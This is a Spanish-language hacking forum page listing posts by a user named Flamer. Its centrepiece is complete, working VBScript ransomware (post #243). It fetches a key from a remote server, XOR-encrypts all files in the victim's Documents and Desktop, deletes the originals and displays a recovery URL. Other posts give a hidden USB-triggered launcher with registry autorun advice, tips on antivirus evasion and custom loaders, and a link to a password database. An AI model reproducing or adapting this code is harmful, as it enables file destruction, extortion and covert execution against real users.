Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Flamer

#241
el primero decodificandolo esto me sale


x^2 - 8x + 16 = 0, Enter (x * 350)


voy por el segundo
#242
Cita de: engel lex en 29 Noviembre 2016, 01:16 AM
no se como se hace en vbs, pero en lugar de usas winrar, podrías abrir los archivos leerlos y reescribirlos cifrados (puede ser algo tan simple como un xor, no es nada de otro mundo y facil de conseguir la password si sabes algo de analisis criptografico y no corres el riesgo que el hdd está lleno y no se puedan crear los rar)

por otro lado la contraseña debe crearse en el server por practicidad

en vbs hasta donde yo se no se pueden leer archivos binarios

y lo de la password no se por que en el servidor, ya que la clave es aleatoria

y si te refieres a eso de analizar los paquetes, si verán cuando envía la clave al servidor, pero si la recibe de el creo que también la verán no crees

saludos flamer

------------------EDITO------------
ya se leer binario en vbs, encontré un código en google, creo que corregiré el codigo
#243
Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código (vb) [Seleccionar]

option explicit
dim shell,fso,document,f,password,desktop,id

set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")

document = shell.SpecialFolders("MyDocuments")
desktop = shell.SpecialFolders("Desktop")

set f = fso.getfolder(document)
id = f.drive.serialnumber

password = Contrasena(id)

cifrar(document)
cifrar(desktop)

msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"

function Contrasena(id)
  dim objhttp
  Set objhttp = createobject("Microsoft.XmlHttp")
 
  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  objhttp.send "id=" & id

  Contrasena = objhttp.responsetext
end function

function cifrar(ruta)
   dim carpeta,listfiles,listfolders,f
   
   set carpeta = fso.getfolder(ruta)
   set listfolders = carpeta.subfolders
   set listfiles = carpeta.files
   
   for each f in listfiles
      archivo(f.path)
   next

   for each f in listfolders
      cifrar(f.path)
   next   
end function

function archivo(path)
   dim file,largo,i,f,b,p,n
   
   set file = fso.getfile(path)

   largo=file.size

   set f = file.OpenAsTextStream()
   redim bytes(largo)
   
   n = 1
   
   for i=0 to largo - 1
      if n = len(password) then
     n = 1
  else
         n = n + 1  
      end if  
  p = asc(mid(password,n,1))
      b = asc(f.read(1)) xor p
  bytes(i) = chr(b)
   next

   f.close 
   
   set f = fso.createtextfile(file.path & ".crypt")

   for n = 0 to i - 1
      f.write(bytes(n))
   next

   f.close
   file.delete
end function




saludos Flamer
#244
hola Telner bienvenido y te voy a hacer sincero aquí nadie te va a enseñar a ser hacker, el hacker lo llevas tu adentro.

En este mundo nadie lleva algún maestro(hasta donde yo se) te digo esto por que ami nadie me enseño nada(no me considero hacker), todo lo aprendí por mi mismo pero si hice unas preguntas por aquí y por aya que para eso son los foros como estos.

pero si quieres iniciarte en esto, se sincero contigo primero y pregúntate que quieres saber o que quieres aprender y para aprender primero esta google y el foro

saludos Flamer y empiesa a buscar por aquí y por aya lo que quieres saber y practica mucho que esto toma años
#245
lo hice rapido pero si no entiendes creo que para mañana o pasado hago un tema de esto en mi blog

aqui el code

Código (vb) [Seleccionar]

option explicit
on error resume next
dim shell,system,usb,disco

set shell = createobject("wscript.shell")
set system = createobject("scripting.filesystemobject")

set usb = system.drives

bat=""  'AQUI PONES LA RUTA DE EL BAT EN LA USB

for each disco in usb
   if disco.drivetype=1 then
      if disco.SerialNumber = "273197608" then 'CAMBIAS ESTO POR TU ID DE USB
         shell.run "cmd /c  " & bat,0 
      end if 
   end if
next


a como lo pides tu tendrás que añadirlo al registro para que se auto ejecute y modificar lo que te e señalado, la ruta del bat en la usb y te dejo de tarea que averiguas tu id de usb es sencillo no todo te lo voy a dar en charola de plata


saludos flamer
#246
por que no te programas tu propio cargador, ya que el bat del vídeo creo que ya esta fichado por los antivirus

mi sugerencia seria mejor en vbscript

saludos flamer y  y créeme programar eso es facil
#247
Dudas Generales / Re: El malware puede hacer esto?
19 Noviembre 2016, 03:44 AM
Cita de: engel lex en 19 Noviembre 2016, 03:16 AM
No, actualmente no puede, incluso ni si quiera sabrás cuando abrió el correo porque el  Servicio copia las imagenes en sus server

no me entendiste yo me refiero a dar clic en un enlace del mail...

por abrir el mail no te pasa nada lo malo esta cuando das clic en un enlace de el o descargas los archivos adjuntos y si tu lo abres la persona no se da cuenta

salu2
#248
CitarLa única manera de hacer lo primero es que un programa ya adentro lo inicie

eso si se puede hacer, este programa tiene que detectar cuando la memoria sea insertada y ejecute al que esta dentro de la usb

saludos flamer y si se puede
#249
Dudas Generales / Re: El malware puede hacer esto?
19 Noviembre 2016, 02:38 AM
te pueden redirigir a una pagina infectada o descargar directamente desde el correo
#250
Dudas Generales / data base de password mysql
19 Noviembre 2016, 02:36 AM
hola navegando en internet encontré esto:

http://www.mysql-password.com/database/200308

alguien de ustedes ya la había visitado o sabían algo

saludos flamer